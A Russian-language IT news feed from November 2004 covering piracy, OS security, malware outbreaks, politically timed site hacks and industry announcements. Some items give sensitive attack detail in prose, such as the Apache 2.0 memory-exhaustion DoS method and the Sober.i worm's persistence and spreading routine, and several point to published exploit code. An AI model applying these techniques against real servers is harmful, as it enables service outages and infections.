Глава Федеральной службы по интеллектуальной собственности, патентам и товарным знакам Борис Симонов сообщил на пресс-конференции в Вашингтоне, что в 2004 году в России возбуждено более 1000 уголовных дел против производителей пиратской продукции и около 700 преступников подверглись уголовному наказанию: "Теневой объем продаж различной контрафактной продукции в России составляет 80-100 миллиардов рублей ежегодно". Есть части рынка компьютерных программ, где легальные продажи достаточно высоки, чтобы рынок бурно развивался. Пиратская доля там, вероятно, все еще выше - но она падает. Это игры для персональных компьютеров под операционной системой Windows. Сегодня российские компании издают такие игры в двух вариантах. Первый - с "западными" ценой и комплектацией: это красивая коробка, в ней кроме диска - книжка с описанием и другие "бонусы", то есть приятные дополнительные мелочи. Скажем, футболка. Такая комплектация - подарочный вариант, дорогой. Но есть и второй - так называемый jewel-box. То есть, простая пластиковая коробочка с диском. Тут нет ни "бонусов", ни инструкций - только сама программа в том же виде, в каком ее можно было бы купить у пиратов или скачать из Интернета. Только стоит такая коробка немногим дороже пиратской, а то и дешевле. Если "пиратский стандарт" сегодня - 100 рублей за диск, то лицензионная игра в упрощенном варианте может стоить рублей 200, реже - 300. А иногда и 90 рублей. Все больше игр - и российских, и западных - продаются таким образом. Пиратам остается отыгрываться за счет более оперативного выпуска игр, выпуская неотличимые от оригинала подделки и т. д. Пиратство - это самосуд. Совершенно незаконный. Но пугающе неизбежный. И сколько ни открывай уголовных дел, возможно, один из способов борьбы с пиратством - устанавливать цены, которые потребители сочли бы справедливыми.
Подробности

22/11/2004 13:09 Статья о повышении безопасности FreeBSD
На сайте xakep.ru опубликована статья Сергея Можайского "Делаем FreeBSD безопасной". В статье рассмотрены такие аспекты безопасности этой итак достаточно надёжной ОС, как: безопасная настройка консоли, настройка прав доступа основных системных файлов, работа с уровнями защиты ядра, шифрование файловой системы, настройка сетевого стека для обеспечения необходимого сетевого уровня защиты, настройка встроенного файрволла (ipfw), настройка tcp-wrapper-а. Собственно, статья врядли будет представлть интерес для опытных системных администраторов, тем не менее, автор свёл воедино множество различных советов и рекомендаций, что, несомненно, будет представлять интерес для начинающих администраторов и пользователей ОС FreeBSD (хотя, разумеется, намного полезнее читать специализированные источники информации, на которые приведены ссылки в самой статье).
Cтатья

22/11/2004 11:46 Уязвимости в Linux-библиотеке libXpm
В Linux-библиотеке libXpm, использующейся в процессе обработки графических файлов, обнаружены несколько очень опасных уязвимостей. Дыры теоретически могут использоваться злоумышленниками в процессе организации DoS-атак на удаленные компьютеры, для получения несанкционированного доступа к машине, а также с целью выполнения на ПК жертвы произвольного вредоносного кода. Нападение может быть организовано через сформированный особым образом графический файл, при обработке которого в приложении, эксплуатирующем уязвимую библиотеку, возникают многочисленные ошибки, в том числе целочисленное переполнение и утечка памяти. Выпущены соответствующие обновления.
Патч для libXpm

22/11/2004 10:39 Microsoft прекращает поддержку NT Server 4
В новом году неприятный сюрприз будет преподнесен пользователям двух миллионов серверов, работающих под управлением ОС Windows NT Server 4.0, предшественницы Windows 2000. С 31 декабря Microsoft прекращает поддержку этой системы. По данным американской компании Boss, специализирующейся в области управления сетевыми активами, тысячи фирм, компьютеры которых работают на Windows NT Server 4.0, до настоящего времени не собирались переходить ни на новые версии ОС, ни на ПО других производителей. Президент и CEO Boss Маха Махадеван (Maha Mahadevan) говорит: «После прекращения поддержки, сети на NT Server 4.0 станут более уязвимыми для хакеров, доступ в сеть будет подвержен сбоям. Производительность работы пользователей снизится, новые программные продукты для бухгалтерии, резервного копирования, почтовые серверы, а также брандмауэры и антивирусы не будут тестироваться на совместимость с NT Server. И даже новое аппаратное обеспечение не сможет работать из-за отсутствия драйверов». В конце-концов, пользователям NT Server придется решать проблемы обеспечения безопасности самостоятельно, либо переходить на другое ПО. Поддержка Windows NT для рабочих станций была прекращена Microsoft 30 июня.
CNews

22/11/2004 10:26 Microsoft знакомит разработчиков с Avalon
До выхода следующей версии Windows еще около двух лет, но в пятницу Microsoft позволила разработчикам бросить первый взгляд на сопутствующий ей новый механизм обработки графики. Компания выпустила то, что она называет community technology preview системы представления информации для Windows Avalon. Это не бета-версия, а скорее неполный набор программ, позволяющий разработчикам опробовать некоторые функции и поделиться своими соображениями с Microsoft. «Эта сборка содержит пару новых функций, которые мы хотим предложить на тестирование заказчикам, — говорит директор отделения разработки Microsoft Джон Монтгомери. — Это всего лишь способ узнать их мнение». Первоначально Avalon предполагалось сделать центральной частью Longhorn, следующей версии Windows. Теперь эту функцию по-прежнему планируется включить в операционную систему, но она будет оформлена и как отдельное дополнение для пользователей Windows XP и Windows Server 2003. Главная цель выпуска версии technology preview — проверить способность Microsoft сделать Avalon совместимой со старыми операционными системами. Microsoft и в прошлом выпускала версии community preview своих продуктов, обычно программ, ориентированных на разработчиков, таких как Visual Studio. Например, в этом году компания выпустила такую версию инструментария моделирования Whitehorse. Avalon — основа будущего Windows, однако среднему пользователю никогда не придется иметь с ней дело напрямую. Это просто улучшенный способ обработки графики, который позволит разработчикам создавать более эффектные приложения. Пока Microsoft надеется, что ей удастся внедрить большую часть функций, которые несет с собой Avalon, в существующие операционной системы, говорит Монтгомери.
Подробнее

22/11/2004 09:54 Программа Skulls убивает приложения в сотовом телефоне
Писатели вирусов нацелились на сотовые телефоны с операционной системой Symbian, выпустив троянца, который убивает системные приложения и заменяет значки изображениями черепов. Программа, которую антивирусные компании прозвали Skulls, спроектирована как менеджер тем в формате Symbian Installation System для телефонов Nokia, пояснил директор по антивирусным исследованиям компании F-Secure Микко Хиппонен. По его словам, всего несколько человек наткнулись на эту программу в вебе и загрузили ее, заполучив троянца в свою систему. «Речь не идет о большом количестве пострадавших, и это не вирус, так что он не распространяется», — заверил Хиппонен. Новая злокачественная программа пополнила список угроз для мобильных телефонов и PDA. В начале ноября программа Delf заразила ПК с целью рассылки спама на мобильные телефоны в России. А затем появились вирусы Mosquito и Cabir, заражающие сотовые телефоны с операционной системой Symbian. Авторы Cabir даже создали версию, которая пытается заразить устройства Windows CE. Как и в последнем случае, ни одна из атак на сотовые телефоны пока не привела к большим жертвам. При исполнении программа Skulls обрывает все связи к системным приложениям Symbian и заменяет значки изображениями черепов. На приложения сторонних производителей она не действует, что позволяет пользователям, у которых установлен альтернативный менеджер файлов, найти и удалить файлы злокачественной программы, очистив телефон. Для тех же, у кого нет независимого менеджера файлов, единственным способом борьбы пока остается жесткий перезапуск, который приводит телефон к первоначальным параметрам по умолчанию. К сожалению, все данные пользователя при этом теряются. «На практике телефон трудно очистить, — говорит Хиппонен. — Вы не можете выйти в онлайн, чтобы загрузить лечащие программы, и не можете связаться с каким-нибудь другим телефоном».
ZDNet

22/11/2004 09:21 Хакеры взломали сайт оппозиционного украинского телеканала
В ночь на понедельник хакеры атаковали сайт оппозиционного "5 канала" Украины, сообщает Корреспондент.net. На главной странице была размещена следующая информация, набранная латиницей: "Po Dannim Rosiyskih sredstv massovoy informacii na 20.00 V.F.Yanukovich nabral 54 procenta. V.A.Yushcenko 44 procenta golosov" ("По данным российских средств массовой информации на 20:00 В.Ф. Янукович набрал 54%, В.А. Ющенко - 44%"). Пресс-служба канала назвала этот факт "очередной провокацией". В настоящее время сайт функционирует в прежнем режиме.
lenta.Ru

21/11/2004 16:29 Выход Knoppix 3.7 RE
В свет вышел LiveCD Linux дистрибутив Knoppix 3.7 Russian Edition. В новую версию внесено много улучшений и исправлений, а также включена поддержка русского языка во всех программах первой необходимости. KNOPPIX поддерживает большинство звуковых и видеокарт, SCSI и USB устройств. При загрузке он распознает конфигурацию системы и автоматически настраивает компьютер, сеть, монтирует логические диски и т.п. Дистрибутив содержит все необходимые программы под Linux объемом около 2Gb и позволяет редактировать русские документы (в том числе в формате MS Word и Excel), работать в Интернет, слушать музыку и многое другое. Работая над дистрибутивом, команда ЛинуксЦентра стремилась создать систему, в которой русскоязычные пользователи Linux могли ознакомиться с возможностями этой системы и производить большую часть повседневной работы с компьютером, пользуясь программным обеспечением с русскоязычным интерфейсом. Основные особенности: оконная среда KDE 3.3.0; OpenOffice 1.1.3 с поддержкой форматов MS-Office, а также с проверкой русской орфографии, расстановкой переносов и справкой на русском языке; руссифицированный браузер Mozilla; удобный переключатель/индикатор раскладок клавиатуры kkbswitch; корректная русификация консоли и меню KDE; кириллические шрифты X11. Кстати, сам CD с системой стоит 90 рублей.
Подробности

21/11/2004 15:14 Описание уязвимостей в Internet Explorer
Ранее мы сообщали о том, что на сайте Secunia появилось сообщение о наличии 2-х уязвимостей, обнаруженных неким "cyber flash". Уязвимости позволяли загружать на компьютер жертвы любой файл (в том числе и исполняемый) под видом HTML-файла. Тут же последовали обвинения со стороны ТОЙ_САМОЙ_КОМПАНИИ, которая, собственно и выпускает "браузер всех времён и народов", суть которых заключалась в том, что Secunia не имела права публиковать сообщение об этой уязвимости (тем более, что её наличие было проверено на полнопатченной системе - в IE со всеми обновлениями и с SP2). Secunia в свою очередь начала оправдываться, что подробности уязвимости раскрыты не были и политика компании состоит в скрытии деталей уязвимости до выпуска патча. Некоторые стали подозревать, что под ником "cyber flash" cкрывались специалисты самой Secunia. Точка в споре была поставлена вчера французской группой K-OTik Security Research, которая написала, что "cyber flash" - реально существующий человек, носящий к тому же то ли кличку, то ли фамилию Vengy. Не обращая никакого внимания на праведный гнев Microsoft, группа опубликовала полный и подробный отчёт об обоих обнаруженных уязвимостях. Более того, на странице также приводится код эксплоита.
Описание уязвимости
Пример эксплоита

21/11/2004 14:58 Выход секьюрити-заплаток для нового ядра Linux
Почти одновременно для недавно вышедшего ядра Linux 2.4.28 были выпущены самые, пожалуй, известные заплатки, существенно повышающие безопасность ядра (ну, и системы в целом, естественно). Речь идёт о знаменитом Openwall-патче от SolarDesigner-а и GRsecurity. Первый вносит изменения в исходный код ядра, позволяющие если и не предотвратить полностью, то существенно затруднить возможность переполнения буфера различными программами. Второй, помимо вышеназванного (ограничения на /proc, fifo, запуск процессов и манипуляции с файловыми линками и т.д.) также добавляет в ядро LIDS - Linux Intrusion Detection/Defence System - систему обнаружения и защиты от вторжения. LIDS позволяет запретить или ограничить доступ к файлам, к памяти, блочным устройствам, сетевым интерфейсам, запущенным программам и т.д. даже для root'а. Правильнее сказать, именно для root'а, так как ограничить доступ для простого пользователя можно и стандартными средствами Linux. Система предназначена для защиты от хакера, который воспользовавшись "дырой" в какой-нибудь программе, получил права root'а. Авторами LIDS являются два студента: Xie Huagang из Китая и Philippe Biondi из Франции.
Openwall-патч
GRsecurity-патч

21/11/2004 12:59 Новая программная Linux-платформа от NEC и Panasonic
Компании NEC и Panasonic Mobile Communications официально представили новую программную Linux-платформу для мобильных телефонов третьего поколения - 3G. Интересно в связи с этим отметить. что как минимум один продающийся в японской рознице телефон - NEC N900iL, уже поставляется с этой платформой, а еще два появятся в самом ближайшем времени (один из них - на днях представленный Panasonic P901i). Новая платформа задумывалась как база для телефонов 3G сетей в Японии, однако, согласно совместному заявлению компаний, лицензирование этой разработки доступно для любой компании в мире. Сейчас программная платформа от NEC/Panasonic работает в сети FOMA (Freedom of Mobile-multimedia Access), так называется "фирменная" 3G сеть оператора NTT DoCoMo. Значительным плюсом новой аппаратной платформы разработчики называют совместимость с множеством Linux-приложений, разработанных третьими компаниями. К слову сказать, Linux набирает все большую и большую популярность среди производителей смартфонов, достаточно вспомнить разработку китайской Datang - Qtopia Phone Edition (QPE), представленную на прошлой неделе и заинтересовавшую Toshiba Information Systems, или разработку шанхайской компании E28, на прошлой неделе удостоенной индустриальной премии на ярмарке в Гонконге.
Mobile-Review

21/11/2004 12:37 IBM установила рекорд производительности серверов
Новый Unix-сервер IBM верхнего уровня на процессорах Power5 победил в сравнительных испытаниях серверов, обслуживающих крупные базы данных. Сервер IBM eServer p5-595 стоимостью $16,7 млн показал 3,21 млн транзакций в минуту на тестах TPC-C организации Transaction Processing Performance Council. С четверга этот сервер доступен для широкого круга заказчиков. Полученный результат побил два предыдущих рекорда: рекорд быстродействия кластера, поставленный машинами Hewlett-Packard на процессорах Itanium с операционной системой Red Hat Linux, который составил 1,18 млн транзакций в минуту, и рекорд быстродействия отдельной системы, установленный сервером IBM Power4 с операционной системой AIX на уровне 1,03 млн транзакций в минуту. Система IBM содержит 32 процессора Power5 1,9 ГГц, у каждого из которых по два вычислительных ядра; 2 Гбайт оперативной памяти; ПО управления базами данных IBM DB2; а также 6548 жестких дисков в 45 системах хранения данных DS4500 и 490 дополнительных системах DS4000.
ZDNet

21/11/2004 11:45 Индия построит собственную "Силиконовую долину"
В индийском штате Керала (Kerala) на территории в 400 гектаров будет построен город, в котором разместятся рабочие центры ИТ-компаний со всего мира, передает Associated Press. Привлечь иностранный бизнес к участию в проекте, названном Смарт-Сити (Smart City), местные власти собираются обещаниями серьезных льгот. Выделенный под строительство участок находится недалеко от города Кочин (Cochin). Свободное пространство администрация штата собирается заполнить офисами, жилыми зданиями и школами, а в завершение сделать там еще и развлекательный комплекс. Компания, открывающая свое представительство в Смарт-Сити, получит возможность без всякой регистрации и лицензирования обзавестись собственным магазином. Однако пока неизвестно будет ли там создана свободная торговая зона. С индийского стороны в городе должны быть представлены разработчики программного обеспечения и предприятия, специализирующиеся на установке и обслуживании call-центров.
Подробности

21/11/2004 10:36 Литовский суд разрешил "Кавказ-центру" вернуться
В субботу второй участковый суд Вильнюса постановил снять все ограничения с деятельности сайта чеченских сепаратистов "Кавказ-центр". "Суд признал противоречащими законам и международным нормам действия правительства и Департамента госбезопасности (ДГБ) Литвы, блокировавших деятельность сервера, обслуживавшего интернет-сайт", - цитирует агентство "Интерфакс" литовского правозащитника Виктораса Пяткуса. Ресурс на законных основаниях может без ограничений работать на территории Литвы в течение года, то есть пока Конституционный суд не решит, не противоречит ли деятельность "Кавказ-центра" в Литве основному закону государства. Суд также отложил на 17 декабря окончательное рассмотрение дела о правомочности постановления Правительства Литвы, руководствуясь которым ДГБ блокировал работу сепаратисткого сайта. Решение о прекращении его деятельности было принято в сентябре на заседании Совета обороны, проведенном президентом Литвы Валдасом Адамкусом. "Кавказ-центр" был закрыт литовскими властями 18 сентября. В начале октября ресурс якобы переехал в Грузию, а затем в Финляндию и какое-то время работал оттуда. 11 октября сайт был вновь закрыт по требованию финской полиции. Примерно через месяц шведский интернет-провайдер Рort80.Se предоставил "Кавказ-центру" хостинг в Швеции. Судя по Whois-сервису, ресурс все еще находится в этой стране.
Lenta.Ru

20/11/2004 18:06 Выход phpBB 2.0.11
Paul S. Owen от имени команды разработчиков популярного ПО для ведения форумов на языке скриптов PHP под названием phpBB, cообщил о выпуске новой версии этого популярного продукта - 2.0.11. После опубликования информации об уязвимости в phpBB в Рунете (и не только) началась волна взлома форумов. В письме с анонсом новой версии автор просил в будущем перед опубликованием эксплоита ставить в известность авторов программного продукта.
Cайт phpBB

20/11/2004 17:28 Эксплоит уязвимости Windows
Опубликован эксплоит уязвимости, обнаруженной в Windows при попытке открытия ZIP-фолдера (MS04-034). Написан на С++ для win32.
Исходный код

20/11/2004 17:06 Поддельный security bulletin от Red Hat
Волна писем с фальшивыми патчами, столь знакомых пользователям Windows, докатилась и до Linux, cообщает bugtraq.ru. Начиная с пятницы, по сети стало бродить письмо, предупреждающее пользователей Linux о наличии в Red Hat 7.2-9.0 и Fedora Core критической уязвимости, позволяющей удаленному пользователю получить полный доступ к атакуемой системе. К письму прилагается ссылка на "патч", призванный устранить данную уязвимость, последствия установки которого вполне очевидны.
Подробнее

20/11/2004 16:54 Microsoft использует Halo 2 для борьбы с хакерами?
Похоже, что Microsoft применяет свою триумфальную игру Halo 2 в качестве орудия борьбы против мод-чипов и других способов взлома видеоигровой консоли Xbox. Сотни владельцев Xbox жалуются в онлайновых форумах, что после попытки поиграть в Halo 2 в онлайне через модифицированную консоль их перестали пускать в службу онлайновых игр Microsoft Xbox Live. Представитель Microsoft не стал говорить, какие приняты меры защиты и приняты ли они вообще. «Microsoft внимательно прислушивается к сообществу геймеров Xbox Live и предпринимает шаги, необходимые для того, чтобы пользователям никто не мешал, — говорится в заявлении компании. — Наша цель — обеспечить им безопасную, гладкую и честную онлайновую игру. Никто не имеет права манипулировать системой в ущерб другим». «Мод-чипы», предлагаемые на сером рынке дополнения, позволяющие игровым консолям работать с импортированными дисками, пиратскими играми и самодельным ПО, появились в обращении вскоре после выхода игровой приставки Xbox четыре года назад. Хакеры, оснастившие свои системы мод-чипами и другими дополнениями, такими как жесткие диски большего размера, заставляют консоли выполнять всевозможные несанкционированные трюки, включая исполнение Linux-ПО и работу в качестве цифровых медиацентров. Microsoft и другие производители оборудования давно борются с мод-чипами, главным образом потому, что эти чипы способствуют распространению пиратских игр. Своей кульминации борьба Microsoft достигла два года назад, когда компания обратилась в Министерство юстиции, и федеральные власти закрыли веб-сайт, где продавались мод-чипы и осуществлялся обмен нелегальными копиями игр.
ZDNet

20/11/2004 16:28 Ожидается ядро 2.7
Большой объем накопившихся за минувший год патчей означает, что в скором времени ядро будет вновь разветвлено на стабильную (2.6) и development-версии (2.7). Об этом сообщил Эндрью Мортон (Andrew Morton) на конференции SDForum. Linux 2.7 будет создан, когда в текущем варианте ядра не останется место для новых "заплаток", сказал г-н Мортон.
Подробности

20/11/2004 16:04 OSDL: Критика Linux со стороны MS безосновательна
Стив Баллмер (Steve Ballmer), глава Microsoft, на днях рапространил сообщение о том, что Linux нарушает 228 патентов. Но данное заявление является лишь искаженным представлением заключений, к которым в августе этого года пришла начинающая компания по защите пользователей Linux от исков по вопросам патентов. Стюарт Коэн (Stuart Cohen), глава Open Source Development Labs (OSDL), уже подготовил и опубликовал ответ на высказывание Баллмера. В нем Коэн подчеркнул, что OSDL и другие компании (HP, Red Hat, Novell, IBM) предоставляют Linux-пользователям защиту от судебных исков со стороны желающих доказать нарушение Linux'ом прав на какую-либо интеллектуальную собственность и патенты. За последние 18 месяцев множество компаний и просто индивидуумов, испуганных успехом Linux, предпринимали попытки доказать, что открытая операцонная система нарушает патенты на другое программное обеспечение. Что примечательно, ни один из этих истцов не упоминал, какие же патенты нарушает Linux.
nixp.ru

20/11/2004 15:41 США: за файлообмен к уголовной ответственности
Звукозаписывающие студии и кинокомпании требуют, чтобы Конгресс США одобрил законопроект, предусматривающий уголовное наказание в виде тюремного заключения для пользователей пиринговых сетей, сообщает Washington Post. Проект закона уже обрел противников, которые считают, что от него могут несправедливо пострадать рядовые потребители. В оппозиционную группу вошли американская Ассоциация производителей бытовой электроники, компания Verizon Communications, группа по защите гражданских свобод Public Knowledge и другие. Пакет документов, состоящий из восьми законопроектов, рассматривается развлекательной индустрией в качестве одной из мер борьбы с интернет-пиратством. Согласно законопроекту Piracy Deterrence and Education Act, те любители файлообмена, кто выложил в интернете 1000 или более музыкальных композиций, могут лишиться свободы сроком на пять лет. К уголовной ответственности будут привлекаться и те, кто записывает фильмы во время сеансов в кинотеатрах. Этот документ уже получил одобрение Палаты представителей Конгресса США в текущем году. Второй проект закона, PIRATE Act, позволяет Министерству юстиции США взыскивать убытки в гражданском порядке с пользователей пиринговых сетей. В настоящее время судебное преследование возможно только за нарушение копирайта. По данным Американской ассоциации звукозаписывающих компаний (RIAA), чем больше популярность пиринговых сетей, тем сильнее сокращаются продажи и доходы звукозаписывающей индустрии. В частности, объемы продаж CD уменьшились с 13,2 млрд. долларов США в 2000 году до 11,2 млрд. долларов США в 2003 году. И хотя в текущем году CD продавались лучше, но показатели все равно не достигнут результатов 2000 года.
Crime-Research.Ru

20/11/2004 14:43 Oracle пересмотрела график выпуска патчей
Пресс-служба Oracle оповестила об изменении графика выпуска обновлений для ПО. В следующем году патчи будут выпускаться ежеквартально, а не ежемесячно, как было запланировано ранее. Это касается обновлений для таких программных средств, как Oracle Application Server, Database, E-Business Suite, Enterprise Manager и Collaboration Suite. Согласно новому плану, патчи в 2005 г. выйдут 18 января, 12 апреля, 12 июля и 18 октября. По мнению руководства Oracle, изменение графика будет способствовать более планомерному системному администрированию, когда обновления не являются «нежданным сюрпризом», как в настоящее время. Специалисты корпорации утверждают, что порядок выпуска патчей в следующем году является балансом между своевременным обеспечением потребителей «заплатами» и упорядоченным управлением ИТ-инфраструктурой. Заявление Oracle последовало через неделю после того, как руководство корпорации отказалось предоставить информацию о недавно найденной уязвимости, за что подверглось со стороны Gartner резкой критике и обвинениям в безразличии к своим пользователям, сообщил Vnunet.
Vnunet

20/11/2004 14:20 Код Java сможет изменять любой желающий
Компания Sun Microsystems объявила о своем намерении сделать код грядущей Java 6 Mustang доступным для всех желающих, cообщает "Компьюлента". Собственно, код уже доступен на официальном сервере компании, но в данный момент это лишь первая версия. Сделан подобный шаг был для того, чтобы любой желающий мог присоединиться к команде разработчиков и принять участие в создании Java 6. Однако с публикацией кода Java под свободной лицензией это событие вовсе не связано. Пока в Sun Microsystems на подобные уступки не готовы и опасаются, что, разрешив всем желающим модифицировать виртуальную машину Java, они, тем самым, поспособствуют созданию множества несовместимых версий. Подобное положение могло бы подорвать репутацию языка - код на Java знаменит тем, что, единожды написанный, он будет запускаться на любой платформе. Так что на данный момент весь код, созданный независимыми программистами для проекта будет добавляться в Java 6 лишь при том условии, что права на него перейдут Sun Microsystems. Руководители проекта считают, что это решение будет оптимальным: программисты со всего мира получат возможность влиять на развитие платформы, что, учитывая контроль со стороны Sun, должно лишь пойти на пользу Java. Подобным образом до сих пор разрабатывались API-библиотеки для Java, и такая схема работы неплохо себя зарекомендовала.
Подробности

20/11/2004 13:52 Microsoft и Dell снабдят ВВС США программным обеспечением
Корпорации Microsoft и Dell в течение более чем шести лет будут поставлять программное обеспечение в американские военно-воздушные силы, передает Reuters. Сумма сделки превышает 500 миллионов долларов. По контракту Microsoft обязуется поставлять в ВВС США серверное ПО, а также заниматься технической поддержкой и обновлениями. Dell в свою очередь обязуется предоставить более 525 тысяч лицензий на использование пакетов программ для персональных компьютеров. Благодаря тому, что вся ответственность за эту работу будет возложена на две компании, ВВС стандартизируют конфигурации своего ПО во всех структурах. До этого множество подобных соглашений заключалось с разными фирмами. Военные отмечают, что новый подход сделает систему централизованной, что незамедлительно скажется должно сказаться на процессах управления и планирования в военно-воздушных силах.
Lenta.Ru

20/11/2004 12:44 I-Worm.Sober.i: распространение нового червя угрожает пользователям интернета
"Лаборатория Касперского" сообщает об обнаружении нового опасного интернет-червя "Sober.i". Вредоносная программа распространяется через интернет в виде вложений в зараженные электронные письма. Помимо функций, стандартных для данного типа вредоносных программ, деструктивный эффект действия "Sober.i" заключается в содержащемся в теле червя механизме удаленного запуска любых файлов по желанию злоумышленника. В настоящее время антивирусные эксперты "Лаборатории Касперского" получают большое число сообщений об обнаружении червя от пользователей западноевропейского региона. "Sober.i" использует обычную для сетевых червей процедуру запуска: активизация червя производится при самостоятельном открытии пользователем файла, приложенного к зараженному письму. После запуска червь выводит на экран ложное сообщение об ошибке: "WinZip Self-Extractor. WinZip_Data_Module is missing ~Error". Затем он создает в системном каталоге Windows два файла с произвольными именами, формируемым из встроенного в тело червя списка. Данные файлы являются основными компонентами червя, производящими сбор адресов и рассылку копий по электронной почте. Затем "Sober.i" копирует себя в системный каталог Windows и регистрирует себя в ключе автозапуска системного реестра. Помимо этого, он создает несколько дополнительных копий и вспомогательных файлов с разными именами в системном каталоге Windows. Для своего размножения "Sober.i" сканирует файловую систему пораженного компьютера в поисках
адресов электронной почты и рассылает себя по обнаруженному списку адресатов. Для отправки почты червь использует собственный SMTP-сервер. Зараженные "Sober.i" письма имеют произвольные темы и тексты на немецком или английском языке (несколько десятков различных вариантов), которые случайным образом составляются из нескольких частей. Имя вложения также может быть с различными расширениями: "pif", "zip", "bat".
Описание

19/11/2004 15:28 "СКИФ К-1000" - в сотне самых мощных компьютеров мира
Объединенный институт проблем информатики Национальной академии наук Беларуси, Институт программных систем Российской академии наук, компания "Т-Платформы" и корпорация AMD объявили о создании сверхпроизводительного суперкомпьютера "Скиф К-1000" в рамках суперкомпьютерной Программы "Скиф" Союзного государства России и Беларуси. Кластер "Скиф К-1000" на базе 576 процессоров AMD Opteron создан осенью 2004 г. по проекту Объединенного института проблем информатики Национальной академии наук Беларуси (ОИПИ НАН Беларуси) и установлен в Минске. В разработке суперкомпьютера "Скиф К-1000" принимали участие ОИПИ НАН Беларуси (Минск), НИИ ЭВМ (Минск), компания "Т-Платформы" (Москва) и ИПС РАН (Переславль-Залесский). Разработка и производство вычислительных узлов кластера, а также сборка и установка тестовой конфигурации системы осуществлены российской компанией "Т-Платформы" в сотрудничестве с ИПС РАН. Пиковая производительность кластера составляет 2.5 терафлопа, реальная производительность на тесте Linpack - 2,032 терафлопа. Суперкомпьютер "Скиф К-1000" является наиболее мощной из всех вычислительных систем, установленных на территориях России, СНГ и Восточной Европы, и входит в число 100 наиболее мощных компьютеров мира. "Скиф К-1000" занял 98-ю позицию в новой редакции мирового рейтинга суперкомпьютеров Top500, изданной 9 ноября 2004 года. Кластер "Скиф К-1000" может применяться для решения любых задач, требующих высокопроизводительных вычислений в наукоемких отраслях промышленности, биотехнологиях, медицине, генетике, геологоразведке, для контроля за окружающей средой, прогнозирования погоды и многих других задач.
Подробности

19/11/2004 14:41 Антивирусы: AntiVir Personal Edition
Выпущена свежая версия антивируса AntiVir Personal Edition. Программа полностью бесплатна для частного использования и обладает практически теми же возможностями, что и платные антивирусы. AntiVir Personal Edition знает и умеет бороться с более чем 50 тысячами вирусов, имеет возможность отслеживать вирусную активность, а вирусную базу программы можно пополнять через Интернет. Объём дистрибутива AntiVir Personal Edition v.6.28.00.10 составляет 4.4 МБ. Поддерживаемые ОС - Windows 9x/ME/2000/XP.
Cкачать

19/11/2004 13:58 В России осужден известный вирусописатель
22 октября 2004 года в г. Ижевске был вынесен приговор по делу Е. А. Сучкова, известного в вирусописательской среде под псевдонимом "Whale", сообщает "Лаборатория Касперского". Обвинение было выдвинуто по 273-й статье Уголовного Кодекса РФ. Евгений Сучков был обвинен в создании двух вредоносных программ - компьютерных вирусов Stepar и Gastropod, а также в публикации исходных кодов этих вирусов и их исполняемых файлов на различных интернет-сайтах, в том числе на сайте известной международной вирусописательской группы 29A. В ходе судебного разбирательства Евгений полностью признал свою вину и оказал значительную помощь следствию. В результате он был признан виновным в совершении преступления, предусмотренного ч. 1 ст. 273 УК РФ и приговорен к штрафу в размере 3000 рублей. "Столь мягкое наказание объясняется тем, что у следствия не имелось заявлений от пострадавших в результате действий созданных Сучковым вирусов, - отмечает антивирусный эксперт "Лаборатории Касперского" Александр Гостев. - С другой стороны, не может не радовать тот факт, что это фактически первый уголовный процесс в России, в результате которого к ответственности был привлечен широко известный автор вирусов, состоявший в печально знаменитой международной вирусописательской группе 29A".
VirusList

19/11/2004 13:31 Анализ кода трояна Bofra/MyDoom.AG/AH
Bryan Burns опубликовал результаты анализа исходного кода трояна под названием Bofra (он же MyDoom.AG/AH), который был обнаружен в диком виде 8 ноября.
Анализ трояна

19/11/2004 12:20 Эксплоит уязвимости Apache 2.0
Опубликован эксплоит уязвимости, обнаруженной в Apache версий 2.0.35-2.0.52. Прредназначен для компиляции на платформе Linux. Работа эксплоита заключается в последовательной посылке большого количесва строк (8000), каждая из которых состоит из 8000 "пробелов". В результате атаки наблюдалось исчерпание всей доступной памяти (RAM) cервера с дальнейшим отказом - DoS. Об уязвимости первоначально сообщил в списке "FullDisclosure" Chintan Trivedi, он же привёл первую версию эксплоита.
Описание
Вторая версия эксплоита

19/11/2004 12:06 Борьба со спамом в России выходит на государственный уровень
В Москве объявлено о создании Российской Национальной коалиции против спама. В нее вошли семь ведущих компаний (российское представительство Microsoft, почтовая служба Mail.ru, портал Rambler, служба e-mail-рассылок Subscribe.ru, агентство "Ашманов и партнеры", "Голден Телеком" и софтверная компания "Лаборатория Касперского"), считающих себя способными бороться с несанкционированными интернет-рассылками на законодательном уровне. По информации "Rambler", спам занимает в России до 75% почтового трафика. Этот показатель будет увеличиваться, так как спам - самый дешевый способ рекламирования товаров и услуг, а надежного технического решения проблемы не существует. В законодательные органы уже активно поступают законопроекты, ставящие рассылку спама вне закона. Так, в проекте Федерального Закона "О правовом регулировании оказания Интернет-услуг" в ст.33 в обязанность отправителя при отправке рекламных сообщений вменяется указывать в теме сообщения строку "на правах рекламы", а п.1 ст.37 содержит следующее положение: "Систематическая умышленная отправка пользователем Интернет по адресам электронной почты данных, не запрошенных получателем и содержащих рекламу, то есть, умышленная передача по адресам электронной почты два и более раз в месяц данных, содержащих рекламу адресату, не передававшему запрос на получение этих данных влечет административный штраф в размере от трех до пяти минимальных размеров оплаты труда, а также возмещение убытков, которые возникли в результате такой передачи данных, если иная ответственность не установлена настоящим законом и иными правовыми актами". В п.2 данной статьи устанавливается несколько более значительная ответственность за повторное административное нарушение, а в ст.38 - солидарная ответственность провайдера за почтовые рассылки отправителя. В поддержку законопроектов «спам вне закона» выступает также Ассоциация компаний, предоставляющих услуги рассылки рекламы по электронной почте (DMA - Ассоциация директ-маркетинга).
Crime-Research.ru

19/11/2004 11:54 Интернет-газету ForUm атаковали хакеры
Украинское общественно-политическое интернет-издание ForUm атаковали хакеры. Об этом сообщил главный редактор издания Виталий Кустов, передает «Итар-Тасс». Он назвал «не случайностью, что интернет-газета была атакована накануне второго тура президентских выборов», который состоится 21 ноября. «Объективны мы или нет — судить читателю, но то, что мы мешаем команде одного из кандидатов в президенты, рвущейся к власти путем погромов в ЦИК, путем массовых фальсификаций на Западной Украине в ходе первого тура выборов и постоянных политических спекуляций — это не вызывает сомнений», — заявил Кустов. «Мы — за честные выборы. И это, естественно, не нравится тем, кого мы заслуженно критикуем», — подчеркнул он. Кустов сообщил, что интернет-газету ежедневно читают более 12 тыс человек. С момента основания ForUm посетили почти 36 млн человек. Интернет-издание отстаивает интересы кандидата в президенты, премьер-министра Виктора Януковича, подвергая резкой критике кандидата от оппозиции Виктора Ющенко.
"ИТАР-ТАСС"

19/11/2004 10:44 В Рунете начались продажи книги Кевина Митника
